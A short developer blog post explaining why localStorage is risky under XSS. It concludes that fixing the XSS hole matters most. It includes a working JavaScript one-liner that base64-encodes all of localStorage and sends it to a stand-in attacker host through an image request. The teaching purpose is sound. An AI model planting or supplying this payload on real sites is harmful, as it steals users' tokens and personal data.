---
title: TIL How to steal localData using an XSS attack
date: 2023-03-20
published: true
tags: ["security", "xss", "mdn"]
series: false
canonical_url: false
description: " But that's just a red flag that opens the door to bigger issues."
layout: layouts/post.njk
---

In local Storage, you can do something like:

```
{"theme": "dark"}
```

Then with JS, you can pull that key-value pair, and set it to dark theme. As long as the browser cache is not manually cleared by the user, it'll be dark mode every time you visit the site.

> Given the potential vectors where malicious actors can access information on your browser's local storage, it is easy to see why sensitive information such as Personally Identifiable Information (PII), authentication tokens, user locations and API keys, etc., should never be stored in the local storage.

via https://www.horangi.com/blog/misuse-of-local-storage

## XSS Attack

If you have a space to execute a attack vector, you can do it.

Say you want to pull that data maliciously. In order to send your data as a url param, you have to use `btoa()` to encode it.

```js
new Image().src = "https://maliciousfood.com/stealLocalStorage?values="
    + btoa(JSON.stringify(localStorage));
```

> The btoa() method creates a Base64-encoded ASCII string from a binary string (i.e., a string in which each character in the string is treated as a byte of binary data).

[MDN btoa()](https://developer.mozilla.org/en-US/docs/Web/API/btoa)

Fun!


## Final Thoughts

> Most developers are afraid of storing tokens in LocalStorage due to XSS attacks. While LocalStorage is easy to access, the problem actually runs a lot deeper.

The article has a point -- if you have a XSS attack vulnerability, it's like leaving your front door open and stealing your local storage is like stealing your family photos.

Those photos? Small fries.

The big issue is that YOUR DOOR IS STILL OPEN.

Solve that first.

Via https://pragmaticwebsecurity.com/articles/oauthoidc/localstorage-xss.html
